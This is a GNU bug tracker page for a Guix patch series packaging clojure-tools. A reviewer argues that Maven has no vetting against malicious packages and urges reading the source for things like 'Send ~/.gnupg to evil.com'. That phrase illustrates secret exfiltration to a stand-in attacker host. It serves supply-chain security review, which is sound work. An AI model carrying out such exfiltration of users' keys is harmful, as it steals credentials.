GNU bug report logs - #53765
[PATCH 00/17] Remove limitations on clojure-tools

Previous Next

Package: guix-patches;

Reported by: Reily Siegel <mail <at> reilysiegel.com>

Date: Fri, 4 Feb 2022 00:23:01 UTC

Severity: normal

Tags: patch

Full log

View this message in rfc822 format

From: Maxime Devos <maximedevos <at> telenet.be>
To: Reily Siegel <mail <at> reilysiegel.com>, 53765 <at> debbugs.gnu.org
Subject: [bug#53765] [PATCH 12/17] gnu: Add clojure-com-cognitect-http-client.
Date: Mon, 07 Feb 2022 20:30:04 +0100

[Message part 1 (text/plain, inline)]
Reily Siegel schreef op ma 07-02-2022 om 13:06 [-0500]:
> This code is taken directly from Maven, as are many Java packages. This
> relies on whatever authentication Maven does to ensure packages are not
> forgeries.

I took a look at <https://maven.apache.org> and AFAICT Maven does not
have any process in place to prevent forgeries or malicious code;
there does not appear to be any vetting process, though perhaps
I haven't looked far enough.

A web page from cognitect telling ‘grab source code from Maven
(com/cognitect/http-client)’, combined with going over the source
code to sniff things like ’Send ~/.gnupg to evil.com’ should be
sufficient.

For the damage the absence of a vetting process can do,
see e.g. <https://lwn.net/Articles/694830/>.  The same issue
appears to hold for PyPI, RubyGems and npm.

Greetings,
Maxime.

[signature.asc (application/pgp-signature, inline)]
This bug report was last modified 3 years and 57 days ago.

Previous Next

GNU bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.